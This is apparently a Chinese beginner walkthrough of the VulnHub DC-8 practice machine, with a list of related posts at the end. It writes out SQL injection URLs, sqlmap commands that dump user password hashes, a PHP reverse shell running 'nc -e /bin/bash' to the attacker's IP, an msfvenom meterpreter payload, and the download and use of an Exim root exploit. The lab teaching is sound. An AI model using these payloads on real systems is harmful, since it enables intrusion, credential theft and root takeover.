目录

  • 靶机DC-8 (详细渗透,适合新手渗透)
    • 0x01靶机描述
    • 0x02环境搭建
      • 1. 下载并导入靶机
      • 2. 查看网络适配器
      • 3. 启动靶机
    • 0x03靶机渗透
      • 一、 信息收集
        • 1. 主机发现
        • 2. 端口扫描
        • 3. 详细扫描
        • 4. 目录扫描
        • 5. gobuster目录扫描
        • 6. 网站指纹识别
      • 二、 漏洞挖掘
        • 手工sql注入
          • 1. 通过手工验证,此处url含有sql注入漏洞
          • 2. 判断字段数
          • 3. 判断显示位置
          • 4. 查看当前数据库
          • 5. 查找库d7db中所有的表
          • 6. 查找uesrs表中所有的列
          • 7. 查询表中的数据
        • sqlmap自动化执行
          • 1. 查当前数据库
          • 2. 查表
          • 3. 查列
          • 4. 查数据
          • 4. 使用John进行暴力破解
          • 5. 可以将破解出来的密码尝试ssh远程登录
          • 6. 在此网页尝试登录,该网页由前面目录扫描得到
        • 远程代码执行漏洞
          • 1.找到可以编辑php代码的地方
          • 2.尝试写phpinfo代码
      • 三、 漏洞利用
        • 方法一:
          • 1. 编写反弹shell脚本
          • 2.保存提交前开启kali进行监听
          • 3. 点击提交发现网页此时正跳转,而我们的攻击机已经拿到shell
        • 方法二:
          • 1. 使用msfvenom制作反弹shell脚本
          • 2.将php代码复制到网站中
          • 3. kali设置msf选项,进行监听
          • 4.提交代码(此时后台默认执行所编写的php脚本代码)
          • 5. 拿到shell,并用python打开一个标准shell
      • 四、 提权
        • 1.find 命令查找具有sudo权限的命令,发现exim4在使用时具有root权限`
        • 2.查看命令exim4命令版本
        • 3.利用serachsploit查找exim命令的漏洞
        • 4.进行查看用法,发现有两个使用方法
        • 5.将文件复制到/tmp目录,并用python打开一个临时的HTTP服务
        • 6.将46996.sh下载到靶机
        • 7.然后我们再重新进行上传
        • 8.查看flag
    • 0x04实验总结

靶机DC-8 (详细渗透,适合新手渗透)

0x01靶机描述

靶机信息

链接 https://www.vulnhub.com/entry/dc-8,367/
发布日期 2019年9月4日
作者 DCAU
难度 简单

0x02环境搭建

1. 下载并导入靶机

打开vmware-文件-打开-DC-8.ova

2. 查看网络适配器

将靶机网络适配器改为NAT模式

3. 启动靶机

点击 ▶靶机,开启成功

0x03靶机渗透

一、 信息收集

1. 主机发现


2. 端口扫描

3. 详细扫描

4. 目录扫描

5. gobuster目录扫描

为了避免漏扫,gobuster再进行目录扫描

6. 网站指纹识别

二、 漏洞挖掘

手工sql注入

1. 通过手工验证,此处url含有sql注入漏洞

http://192.168.30.206/?nid=2 and 1=1 --+

http://192.168.30.206/?nid=2 and 1=2 --+

2. 判断字段数

http://192.168.30.206/?nid=2 order by 1 --+

http://192.168.30.206/?nid=2 order by 2 --+

所以可以看出字段数为1

3. 判断显示位置

http://192.168.30.206/?nid=-2 union select 1 --+

4. 查看当前数据库

5. 查找库d7db中所有的表

http://192.168.30.206/?nid=-2 union select group_concat(table_name) from
information_schema.tables where table_schema=‘d7db’ --+

6. 查找uesrs表中所有的列

http://192.168.30.206/?nid=-2 union select group_concat(column_name) from
information_schema.columns where table_name=‘users’ --+

7. 查询表中的数据

http://192.168.30.206/?nid=-2 union select group_concat(name) from users --+

http://192.168.30.206/?nid=-2 union select group_concat(pass) from users --+

sqlmap自动化执行

1. 查当前数据库
sqlmap -u 'http://192.168.30.206/?nid=2' -current-db

2. 查表
sqlmap -u 'http://192.168.30.206/?nid=2' -D d7db --tables

3. 查列
sqlmap -u 'http://192.168.30.206/?nid=2' -D d7db -T users --columns

4. 查数据
sqlmap -u 'http://192.168.30.206/?nid=2' -D d7db -T users -C login,name,pass --dump

查询到两组数据

admin $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john  $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
4. 使用John进行暴力破解

破解出john的密码trutle

5. 可以将破解出来的密码尝试ssh远程登录

发现ssh远程登录失败,发现需要使用公私钥登录

6. 在此网页尝试登录,该网页由前面目录扫描得到
http://192.168.30.206/user

登录成功

  • 远程代码执行漏洞

1.找到可以编辑php代码的地方

2.尝试写phpinfo代码


发现保存并提交后并没有任何显示。按照网上的说法,php代码保存后会执行代码,这应该是在靶机上已经执行了代码,只是在后台不会显示出来。

三、 漏洞利用

方法一:

1. 编写反弹shell脚本

我们尝试执行PHP反弹shell脚本,将原有的<p>flag</p>进行保留,防止报错

<p>flag</p>
<?php
system("nc -e /bin/bash 192.168.30.182 4567");
?>

2.保存提交前开启kali进行监听

3. 点击提交发现网页此时正跳转,而我们的攻击机已经拿到shell

方法二:

1. 使用msfvenom制作反弹shell脚本
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.30.182 lport=9999R >php_shell.txt

2.将php代码复制到网站中

3. kali设置msf选项,进行监听


4.提交代码(此时后台默认执行所编写的php脚本代码)

5. 拿到shell,并用python打开一个标准shell
python -c 'import pty;pty.spawn("/bin/bash")'

四、 提权

1.find 命令查找具有sudo权限的命令,发现exim4在使用时具有root权限`
find / -perm -u=s -type f 2>/dev/null

2.查看命令exim4命令版本

Exim version 4.89

3.利用serachsploit查找exim命令的漏洞

4.进行查看用法,发现有两个使用方法

5.将文件复制到/tmp目录,并用python打开一个临时的HTTP服务

6.将46996.sh下载到靶机
wget http://192.168.30.182/46996.sh

进行赋权

执行,但是发现两种方法均发生错误

原因:这个报错是由于windows系统下编辑然后上传到linux系统执行导致的
解决方案:本地编辑查看文件类型:set ff=unix

7.然后我们再重新进行上传

使用第二个提权命令进行提权成功

./46996.sh -m netcat


8.查看flag

0x04实验总结

这个靶机考察了目录扫描,sql注入,远程代码执行,反弹shell,提权时使用find查找可以执行的命令,对命令exim的版本提权漏洞等,是一个不错的靶机,适合新手来渗透

靶机DC-8(详细渗透,适合新手渗透)相关推荐

  1. 靶机渗透SickOs1.2(非常详细,适合新手渗透)

    靶机SickOs1.2的目录 0x01靶机描述 0x02环境搭建 0x03靶机渗透 一. 信息收集 二. 漏洞挖掘 PUT方法任意写文件漏洞 1. 查看web主页 2. 查看/test目录支持的方法 ...

  2. ICP备案教程-图文详细流程适合新手小白(Chinar出品)

    如博文无法正常显示,请访问原文地址: https://blog.csdn.net/ChinarCSDN/article/details/82709358 ICP域名备案流程 本文提供全流程,中文翻译. ...

  3. 2021最新 ICP备案教程-图文详细流程适合新手小白

    1 ICP-Internet Content Provider -- 网络内容提供商 ICP -- 可以理解为经过国家主管部门批准的正式企业或部门,向用户提供互联网业务和服务的运营商 比如:阿里云.腾 ...

  4. c语言写贪吃蛇什么水平_细致的C语言写贪吃蛇教程+详细思路-适合新手附源码...

    #史上最详细的C语言贪吃蛇教程 #前言 在有用C写贪吃蛇的一个想法之后,上网查了几个教程,觉得不是很能看懂.恩...或者说不是一下子就能看出来思路+具体怎么实现.所以,我花了早自习的时间想了想如何用最 ...

  5. (过程超详细)适合新手的ATK-ESP8266+STM32F103系列单片机通过MQTT协议直连阿里云的教程

    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一.所用到的硬件设备 二.调试步骤 1.固件的烧录 2.创造阿里云的产品 3.代码修改 4.最终的硬件连接及效果图 总 ...

  6. 注册Github账号详细教程【超详细篇 适合新手入门】

    目录 一.GitHub的简介 1.大概介绍 2.详细介绍 二.如何注册自己的GitHub账户 1.进入github的官网 2.点击右上角注册按钮sign up,来到注册页面 3.在光标处输入自己的邮箱 ...

  7. redis集群搭建(非常详细,适合新手)

    redis集群搭建 在开始redis集群搭建之前,我们先简单回顾一下redis单机版的搭建过程 下载redis压缩包,然后解压压缩文件: 进入到解压缩后的redis文件目录(此时可以看到Makefil ...

  8. c++贪吃蛇_细致的C语言写贪吃蛇教程+详细思路-适合新手附源码

    在有用C写贪吃蛇的一个想法之后,上网查了几个教程,觉得不是很能看懂.恩...或者说不是一下子就能看出来思路+具体怎么实现.所以,我花了早自习的时间想了想如何用最简单的方法实现,晚上大约两个小时写了出来 ...

  9. (超详细、适合新手)QQ三国实现24小时挂机摆摊卡键喊话

    QQ三国原创作者--贴吧ID:杜康技术总监℃ 说明:12到24周岁,没错就是12周岁到24周岁的,现在只要10元一个月就可以24小时挂机,因为阿里有学生套餐,不是的去借一个别人注册好的号购买,或者自己 ...

最新文章

  1. 撞库:2017年的大麻烦
  2. MongoDB索引实战技巧
  3. 如何用计算机组添加打印机共享的打印机,工作组内打印机如何共享?
  4. 配置所需要的依赖_配置spring所需要的jar包
  5. 存储如何让文件小一点_如何使用Redis接管文件存储
  6. cupsd进程_linux pstree命令显示正在运行的进程的进程树状图
  7. 破旧立新 “云”称霸
  8. 改变世界的程序员—Jack Dorsey (程序员 2011-6)
  9. stm32 代码加密
  10. MATLAB —— 绘制频谱图
  11. 涨姿势 之 Sourcetree 显示头像
  12. 安卓或苹果IOS的APP应用如何取名字?好的名字技巧?
  13. php 利用 PHPExcel 导出 导入 Excel 方法介绍(功能介绍)
  14. [每日一题] 11gOCP 1z0-052 :2013-09-28 ORA-01555: snapshot too old......................C52
  15. fastadmin 表头随滚轮滚动 bootstrap-table-fixed-columns 左侧随滚轮滚动
  16. 论文超详细精读|五千字:STGR
  17. PspTerminateProcess 结束冰刃进程
  18. 度数换算_度数的换算
  19. 【“Unfortunately,app has stoped”问题与解决】
  20. 测量中的坐标与时间系统1.3(在大地测量学中)

热门文章

  1. oracle 03002,RMAN-03002 RMAN-06091 错误解决方法
  2. 什么样的开题报告会被毙掉?
  3. 谷歌浏览器安装xpath显示程序包无效
  4. 分类问题中的数据不平衡问题
  5. 【AI CLUB】机器学习基础丨01
  6. 第九章、结构体与共用体
  7. 学习Linux运维必备的50个命令
  8. Vim中Java代码的自动补全
  9. 社会工程学攻击之鱼叉式攻击
  10. 为什么你的手机空间不足